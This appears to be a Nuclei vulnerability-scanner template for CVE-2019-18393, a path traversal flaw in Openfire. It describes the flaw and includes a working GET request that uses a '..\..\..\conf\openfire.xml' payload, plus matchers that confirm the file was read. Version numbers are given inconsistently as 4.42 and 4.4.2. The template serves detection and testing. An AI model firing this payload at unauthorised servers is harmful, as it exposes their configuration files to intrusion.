46 lines
1.5 KiB
YAML
46 lines
1.5 KiB
YAML
id: CVE-2019-18393
|
|
|
|
info:
|
|
name: Ignite Realtime Openfire <4.42 - Local File Inclusion
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory.
|
|
remediation: |
|
|
Upgrade Ignite Realtime Openfire to version 4.42 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/igniterealtime/Openfire/pull/1498
|
|
- https://swarm.ptsecurity.com/openfire-admin-console/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-18393
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2019-18393
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00161
|
|
epss-percentile: 0.52634
|
|
cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: igniterealtime
|
|
product: openfire
|
|
tags: cve,cve2019,openfire,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/plugins/search/..\..\..\conf\openfire.xml'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "org.jivesoftware.database.EmbeddedConnectionProvider"
|
|
- "Most properties are stored in the Openfire database"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100f6660d14428966205de1f79836cbdda7e45ae53d6c874c8e67df28b76447982c022100873e934169413b17c94d0e1c10d0f731d261a1268b9040f04e5611ea616295fa:922c64590222798bb761d5b6d8e72950
|